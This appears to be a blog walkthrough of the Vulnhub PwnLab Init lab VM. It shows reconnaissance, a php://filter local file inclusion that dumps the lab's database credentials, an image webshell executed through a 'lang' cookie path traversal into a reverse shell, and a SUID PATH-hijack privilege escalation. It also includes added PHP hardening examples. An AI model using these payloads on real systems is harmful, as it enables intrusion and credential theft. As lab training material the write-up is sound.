Vulnhub PwnLab Init Walkthrough

PwnLab Init

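Key points of this machine:

  1. A local file inclusion vulnerability (a filter bypass technique is needed)
  2. How to use a cookie to get an image webshell executed

Identifying the target host's IP address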

(kali㉿kali)-[~/Vulnhub/Pwnlab_init]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.91.0/16   |   Screen View: Unique Hosts        
                                                                            
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:0a      1      60  Unknown vendor           
 192.168.56.100  08:00:27:53:de:4e      1      60  PCS Systemtechnik GmbH   
 192.168.56.139  08:00:27:c6:fb:d4      1      60  PCS Systemtechnik GmbH   

Kali's built-in netdiscover tool identifies the target host's IP address as 192.168.56.139.

Nmap scan

└─$ sudo nmap -sS -sV -sC -p- 192.168.56.139 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-29 05:43 EDT
Nmap scan report for bogon (192.168.56.139)
Host is up (0.00015s latency).
Not shown: 65531 closed tcp ports (reset)
PORT      STATE SERVICE VERSION
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
|_http-title: PwnLab Intranet Image Hosting
|_http-server-header: Apache/2.4.10 (Debian)
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          39141/udp6  status
|   100024  1          39425/tcp   status
|   100024  1          47752/udp   status
|_  100024  1          52535/tcp6  status
3306/tcp  open  mysql   MySQL 5.5.47-0+deb8u1
| mysql-info: 
|   Protocol: 10
|   Version: 5.5.47-0+deb8u1
|   Thread ID: 38
|   Capabilities flags: 63487
|   Some Capabilities: LongPassword, IgnoreSigpipes, Speaks41ProtocolNew, Speaks41ProtocolOld, ODBCClient, DontAllowDatabaseTableColumn, ConnectWithDatabase, FoundRows, Support41Auth, InteractiveClient, IgnoreSpaceBeforeParenthesis, LongColumnFlag, SupportsLoadDataLocal, SupportsCompression, SupportsTransactions, SupportsAuthPlugins, SupportsMultipleResults, SupportsMultipleStatments
|   Status: Autocommit
|   Salt: %jjTE;;RlJk^rEBXsZH:
|_  Auth Plugin Name: mysql_native_password
39425/tcp open  status  1 (RPC #100024)
MAC Address: 08:00:27:C6:FB:D4 (Oracle VirtualBox virtual NIC)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.49 seconds

Get Access

Analyze the ports found by the Nmap scan one by one.

─(kali㉿kali)-[~/Vulnhub/Pwnlab_init]
└─$ curl http://192.168.56.139           
<html>
<head>
<title>PwnLab Intranet Image Hosting</title>
</head>
<body>
<center>
<img src="images/pwnlab.png"><br />
[ <a href="/">Home</a> ] [ <a href="?page=login">Login</a> ] [ <a href="?page=upload">Upload</a> ]
<hr/><br/>
Use this server to upload and share image files inside the intranet</center>
</body>
</html>   

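The page offers an upload function, but you have to log in first.

Next, check whether the login check can be bypassed with SQL injection; the attempt failed.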

──(kali㉿kali)-[~/Vulnhub/Pwnlab_init]
└─$ gobuster dir -u http://192.168.56.139 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt 
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.139
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.2.0-dev
[+] Timeout:                 10s
===============================================================
2022/10/29 05:54:52 Starting gobuster in directory enumeration mode
===============================================================
/images               (Status: 301) [Size: 317] [--> http://192.168.56.139/images/]                                                                       
/upload               (Status: 301) [Size: 317] [--> http://192.168.56.139/upload/]                                                                       
/server-status        (Status: 403) [Size: 302]
Progress: 207187 / 207644 (99.78%)===============================================================
2022/10/29 05:55:23 Finished
===============================================================
                                                                   

So far nothing obviously useful has turned up.

──(kali㉿kali)-[~/Vulnhub/Pwnlab_init]
└─$ nikto -h  http://192.168.56.139
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.139
+ Target Hostname:    192.168.56.139
+ Target Port:        80
+ Start Time:         2022-10-29 06:04:09 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.10 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ IP address found in the 'location' header. The IP is "127.0.1.1".
+ OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is "127.0.1.1".
+ Apache/2.4.10 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Cookie PHPSESSID created without the httponly flag
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ /config.php: PHP Config file may contain database IDs and passwords.
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.php: Admin login page/section found.
+ 7915 requests: 0 error(s) and 12 item(s) reported on remote host
+ End Time:           2022-10-29 06:05:02 (GMT-4) (53 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Nikto reports that /config.php may contain the database username and password.

─(kali㉿kali)-[~/Vulnhub/Pwnlab_init]
└─$ curl http://192.168.56.139/config.php

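Requesting the file directly, however, returns nothing.

The URL http://192.168.56.139/?page=login suggests checking for an LFI (local file inclusion) vulnerability. The test returned nothing, so some kind of filtering is probably in place; the next step is to try to get around that filtering.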

──(kali㉿kali)-[~/Vulnhub/Pwnlab_init]
└─$ curl http://192.168.56.139/?page=php://filter/convert.base64-encode/resource=config
<html>
<head>
<title>PwnLab Intranet Image Hosting</title>
</head>
<body>
<center>
<img src="images/pwnlab.png"><br />
[ <a href="/">Home</a> ] [ <a href="?page=login">Login</a> ] [ <a href="?page=upload">Upload</a> ]
<hr/><br/>
PD9waHANCiRzZXJ2ZXIJICA9ICJsb2NhbGhvc3QiOw0KJHVzZXJuYW1lID0gInJvb3QiOw0KJHBhc3N3b3JkID0gIkg0dSVRSl9IOTkiOw0KJGRhdGFiYXNlID0gIlVzZXJzIjsNCj8+</center>
</body>
</html>                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Pwnlab_init]
└─$ echo "PD9waHANCiRzZXJ2ZXIJICA9ICJsb2NhbGhvc3QiOw0KJHVzZXJuYW1lID0gInJvb3QiOw0KJHBhc3N3b3JkID0gIkg0dSVRSl9IOTkiOw0KJGRhdGFiYXNlID0gIlVzZXJzIjsNCj8+" | base64 -d
<?php
$server   = "localhost";
$username = "root";
$password = "H4u%QJ_H99";
$database = "Users";
?>                     

The database username and password are recovered.

Logging in to the database

─$ mysql -h 192.168.56.139 -u root -p
Enter password: 
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MySQL connection id is 107
Server version: 5.5.47-0+deb8u1 (Debian)

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MySQL [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| Users              |
+--------------------+
2 rows in set (0.001 sec)

MySQL [(none)]> use users;
ERROR 1044 (42000): Access denied for user 'root'@'%' to database 'users'
MySQL [(none)]> use Users;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MySQL [Users]> show tables;
+-----------------+
| Tables_in_Users |
+-----------------+
| users           |
+-----------------+
1 row in set (0.001 sec)

MySQL [Users]> select * from users
    -> ;
+------+------------------+
| user | pass             |
+------+------------------+
| kent | Sld6WHVCSkpOeQ== |
| mike | U0lmZHNURW42SQ== |
| kane | aVN2NVltMkdSbw== |
+------+------------------+
3 rows in set (0.001 sec)

MySQL [Users]> 

This yields 3 usernames and passwords (base64-encoded).

──(kali㉿kali)-[~/Vulnhub/Pwnlab_init]
└─$ echo "Sld6WHVCSkpOeQ==" |base64 -d
JWzXuBJJNy                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Pwnlab_init]
└─$ echo "U0lmZHNURW42SQ==" | base64 -d
SIfdsTEn6I                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Pwnlab_init]
└─$ echo "aVN2NVltMkdSbw==" | base64 -d
iSv5Ym2GRo    

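From the earlier information gathering we know that users can upload files, so log in with the usernames and passwords obtained above.

Uploading shell.php returns the error: Not allowed extension, please upload images only.

First use the same kind of LFI (local file inclusion) as before to look at the source code of upload.php.

Request: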

http://192.168.56.139/?page=php://filter/convert.base64-encode/resource=upload
─(kali㉿kali)-[~/Vulnhub/Pwnlab_init]
└─$ echo "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" | base64 -d
<?php
session_start();
if (!isset($_SESSION['user'])) { die('You must be log in.'); }
?>
<html>
        <body>
                <form action='' method='post' enctype='multipart/form-data'>
                        <input type='file' name='file' id='file' />
                        <input type='submit' name='submit' value='Upload'/>
                </form>
        </body>
</html>
<?php 
if(isset($_POST['submit'])) {
        if ($_FILES['file']['error'] <= 0) {
                $filename  = $_FILES['file']['name'];
                $filetype  = $_FILES['file']['type'];
                $uploaddir = 'upload/';
                $file_ext  = strrchr($filename, '.');
                $imageinfo = getimagesize($_FILES['file']['tmp_name']);
                $whitelist = array(".jpg",".jpeg",".gif",".png"); 

                if (!(in_array($file_ext, $whitelist))) {
                        die('Not allowed extension, please upload images only.');
                }

                if(strpos($filetype,'image') === false) {
                        die('Error 001');
                }

                if($imageinfo['mime'] != 'image/gif' && $imageinfo['mime'] != 'image/jpeg' && $imageinfo['mime'] != 'image/jpg'&& $imageinfo['mime'] != 'image/png') {
                        die('Error 002');
                }

                if(substr_count($filetype, '/')>1){
                        die('Error 003');
                }

                $uploadfile = $uploaddir . md5(basename($_FILES['file']['name'])).$file_ext;

                if (move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)) {
                        echo "<img src=\"".$uploadfile."\"><br />";
                } else {
                        die('Error 4');
                }
        }
}

?>                        

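The page clearly enforces a whitelist: only .jpg, .jpeg, .gif and .png files may be uploaded.

So the whitelist has to be bypassed by building an image webshell.

Take any image, open it in an editor such as vim, paste the PHP reverse shell code at the end, and upload it.

The image webshell uploads successfully.

After the upload, its address is:

http://192.168.56.139/upload/a7c3ce076585477741d951d179ab07dc.jpg

Requesting that file does not give a shell.

This means the image webshell was not executed, and another execution path is needed.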
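The upload.php checks shown above only look at the extension and the image header, so appended bytes are stored unchanged. The following added example (not code from the target or from the original post) re-encodes the upload with GD so that only pixel data is kept, and picks the stored name on the server; the function names and the sample marker are hypothetical.

```php
<?php
// Added example: re-encode an uploaded image so only pixel data is stored.
// Requires the GD extension. Function and marker names are hypothetical.

/**
 * Decode $bytes as an image and return a freshly encoded PNG, or null when
 * the input is not a decodable GIF/JPEG/PNG. Anything that is not pixel data
 * (trailing bytes, comments, metadata) is not carried over.
 */
function reencode_image(string $bytes): ?string
{
    $info = @getimagesizefromstring($bytes);
    $allowed = [IMAGETYPE_GIF, IMAGETYPE_JPEG, IMAGETYPE_PNG];
    if ($info === false || !in_array($info[2], $allowed, true)) {
        return null;
    }
    $img = @imagecreatefromstring($bytes);
    if ($img === false) {
        return null;
    }
    ob_start();
    imagepng($img);          // write a new file from the decoded pixels
    return ob_get_clean();
}

/** Server-chosen name: random, fixed extension, nothing taken from the client. */
function storage_name(): string
{
    return bin2hex(random_bytes(16)) . '.png';
}

// Constructed sample: a valid 8x8 PNG with a harmless marker appended,
// standing in for the "image plus trailing PHP" file described above.
$src = imagecreatetruecolor(8, 8);
ob_start();
imagepng($src);
$sample = ob_get_clean() . '<?php /* constructed marker */ ?>';

$clean = reencode_image($sample);
// The sample still looks like an image to a header-based check...
var_dump(getimagesizefromstring($sample) !== false);
// ...and carries the marker, which is absent from the re-encoded copy.
var_dump(strpos($sample, '<?php') !== false);
var_dump($clean !== null && strpos($clean, '<?php') === false);
echo storage_name(), "\n";
```

Re-encoding only deals with appended bytes; what stops a stored upload from being interpreted as PHP is removing the user-controlled include() in index.php.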

Analyze the source code of index.php (retrieved through the local file inclusion vulnerability).

┌──(kali㉿kali)-[~/Vulnhub/Pwnlab_init]
└─$ echo "PD9waHANCi8vTXVsdGlsaW5ndWFsLiBOb3QgaW1wbGVtZW50ZWQgeWV0Lg0KLy9zZXRjb29raWUoImxhbmciLCJlbi5sYW5nLnBocCIpOw0KaWYgKGlzc2V0KCRfQ09PS0lFWydsYW5nJ10pKQ0Kew0KCWluY2x1ZGUoImxhbmcvIi4kX0NPT0tJRVsnbGFuZyddKTsNCn0NCi8vIE5vdCBpbXBsZW1lbnRlZCB5ZXQuDQo/Pg0KPGh0bWw+DQo8aGVhZD4NCjx0aXRsZT5Qd25MYWIgSW50cmFuZXQgSW1hZ2UgSG9zdGluZzwvdGl0bGU+DQo8L2hlYWQ+DQo8Ym9keT4NCjxjZW50ZXI+DQo8aW1nIHNyYz0iaW1hZ2VzL3B3bmxhYi5wbmciPjxiciAvPg0KWyA8YSBocmVmPSIvIj5Ib21lPC9hPiBdIFsgPGEgaHJlZj0iP3BhZ2U9bG9naW4iPkxvZ2luPC9hPiBdIFsgPGEgaHJlZj0iP3BhZ2U9dXBsb2FkIj5VcGxvYWQ8L2E+IF0NCjxoci8+PGJyLz4NCjw/cGhwDQoJaWYgKGlzc2V0KCRfR0VUWydwYWdlJ10pKQ0KCXsNCgkJaW5jbHVkZSgkX0dFVFsncGFnZSddLiIucGhwIik7DQoJfQ0KCWVsc2UNCgl7DQoJCWVjaG8gIlVzZSB0aGlzIHNlcnZlciB0byB1cGxvYWQgYW5kIHNoYXJlIGltYWdlIGZpbGVzIGluc2lkZSB0aGUgaW50cmFuZXQiOw0KCX0NCj8+DQo8L2NlbnRlcj4NCjwvYm9keT4NCjwvaHRtbD4=" | base64 -d
<?php
//Multilingual. Not implemented yet.
//setcookie("lang","en.lang.php");
if (isset($_COOKIE['lang']))
{
        include("lang/".$_COOKIE['lang']);
}
// Not implemented yet.
?>
<html>
<head>
<title>PwnLab Intranet Image Hosting</title>
</head>
<body>
<center>
<img src="images/pwnlab.png"><br />
[ <a href="/">Home</a> ] [ <a href="?page=login">Login</a> ] [ <a href="?page=upload">Upload</a> ]
<hr/><br/>
<?php
        if (isset($_GET['page']))
        {
                include($_GET['page'].".php");
        }
        else
        {
                echo "Use this server to upload and share image files inside the intranet";
        }
?>
</center>
</body>
</html>                    

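The following part of the code shows that the file named by Cookie['lang'] is included and therefore executed, so use Burp Suite to modify the cookie value.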

if (isset($_COOKIE['lang']))
{
        include("lang/".$_COOKIE['lang']);
}
// Not implemented yet.
?>
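Both include() calls in the index.php source above build a path from request data (`$_GET['page']` and `$_COOKIE['lang']`). The following added example (not code from the target or from the original post) shows the same two includes driven by allowlists instead; the page and language file names are assumptions taken from the links and the commented-out setcookie() call in that source.

```php
<?php
// Added example: hardened replacement for the two include() calls in index.php.
// The allowlists and file names are assumptions based on the page's links and
// the commented-out setcookie("lang","en.lang.php") line.

const PAGES = [            // ?page= value => file on disk
    'login'  => 'login.php',
    'upload' => 'upload.php',
];
const LANGS = [            // lang cookie value => file under lang/
    'en' => 'en.lang.php',
];

/**
 * Map an untrusted key to a fixed file name, or null if it is not allowlisted.
 * The user's value is never concatenated into a path, so php:// wrappers and
 * ../ sequences have nothing to act on.
 */
function resolve_include(array $allowlist, string $baseDir, $key): ?string
{
    if (!is_string($key) || !array_key_exists($key, $allowlist)) {
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . '/' . $allowlist[$key]);
    if ($base === false || $path === false) {
        return null;
    }
    // Defence in depth: the resolved file must stay inside $baseDir.
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($path, $prefix, strlen($prefix)) === 0 ? $path : null;
}

$lang = resolve_include(LANGS, __DIR__ . '/lang', $_COOKIE['lang'] ?? null);
if ($lang !== null) {
    include $lang;
}

$page = resolve_include(PAGES, __DIR__, $_GET['page'] ?? null);
if ($page !== null) {
    include $page;
} else {
    echo 'Use this server to upload and share image files inside the intranet';
}
```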

Intercept the request with Burp (requesting http://192.168.56.139/index.php) and add lang=../upload/a7c3ce076585477741d951d179ab07dc.jpg to the cookie.

The shell comes back successfully.

─$ sudo nc -nlvp 5555
[sudo] password for kali: 
listening on [any] 5555 ...
connect to [192.168.56.137] from (UNKNOWN) [192.168.56.139] 38576
Linux pwnlab 3.16.0-4-686-pae #1 SMP Debian 3.16.7-ckt20-1+deb8u4 (2016-02-29) i686 GNU/Linux
 15:41:41 up  2:01,  0 users,  load average: 0.00, 0.01, 0.05
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ which python
/usr/bin/python
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@pwnlab:/$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@pwnlab:/$ 

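Since usernames and passwords were obtained earlier, the guess is that they are also valid usernames and passwords on the operating system.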

kent@pwnlab:~$ find / -type f -perm /4000 2>/dev/null
find / -type f -perm /4000 2>/dev/null
/bin/mount
/bin/su
/bin/umount
/sbin/mount.nfs
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/at
/usr/bin/passwd
/usr/bin/procmail
/usr/bin/chsh
/usr/bin/gpasswd
/usr/lib/eject/dmcrypt-get-device
/usr/lib/pt_chown
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/sbin/exim4
kent@pwnlab:~$ sudo -l
sudo -l
-su: sudo: command not found
kent@pwnlab:~$ ls -alh
ls -alh
total 20K
drwxr-x--- 2 kent kent 4.0K Mar 17  2016 .
drwxr-xr-x 6 root root 4.0K Mar 17  2016 ..
-rw-r--r-- 1 kent kent  220 Mar 17  2016 .bash_logout
-rw-r--r-- 1 kent kent 3.5K Mar 17  2016 .bashrc
-rw-r--r-- 1 kent kent  675 Mar 17  2016 .profile
kent@pwnlab:~$ 

Nothing usable here, so look at the other users.

kent@pwnlab:~$ su - kane
su - kane
Password: iSv5Ym2GRo

kane@pwnlab:~$ id
id
uid=1003(kane) gid=1003(kane) groups=1003(kane)
kane@pwnlab:~$ sudo -l
sudo -l
-su: sudo: command not found
kane@pwnlab:~$ find / -type f -perm /4000 2>/dev/null
find / -type f -perm /4000 2>/dev/null
/bin/mount
/bin/su
/bin/umount
/sbin/mount.nfs
/home/kane/msgmike
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/at
/usr/bin/passwd
/usr/bin/procmail
/usr/bin/chsh
/usr/bin/gpasswd
/usr/lib/eject/dmcrypt-get-device
/usr/lib/pt_chown
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/sbin/exim4

msgmike has the SUID bit set and can be used for privilege escalation.

kane@pwnlab:~$ /home/kane/msgmike
/home/kane/msgmike
cat: /home/mike/msg.txt: No such file or directory

msgmike uses cat to display some content.

kane@pwnlab:~$ echo '/bin/sh' > cat
echo '/bin/sh' > cat
kane@pwnlab:~$ chmod 777 cat
chmod 777 cat
kane@pwnlab:~$ export PATH=./:$PATH
export PATH=./:$PATH
kane@pwnlab:~$ ls
ls
cat  msgmike
kane@pwnlab:~$ ./msgmkie
./msgmkie
-su: ./msgmkie: No such file or directory
kane@pwnlab:~$ export PATH=:./:$PATH
export PATH=:./:$PATH
kane@pwnlab:~$ pwd
pwd
/home/kane
kane@pwnlab:~$ ./msgmike
./msgmike
$ id
id
uid=1002(mike) gid=1002(mike) groups=1002(mike),1003(kane)
$ 

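After running msgmike, the user changes to mike.

At this point msgroot shows up in mike's directory, and this executable also has the SUID bit set; run it.

It turns out to display whatever is entered, so perform command injection (using a semicolon).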


posted @ 2022-10-29 20:09  Jason_huawen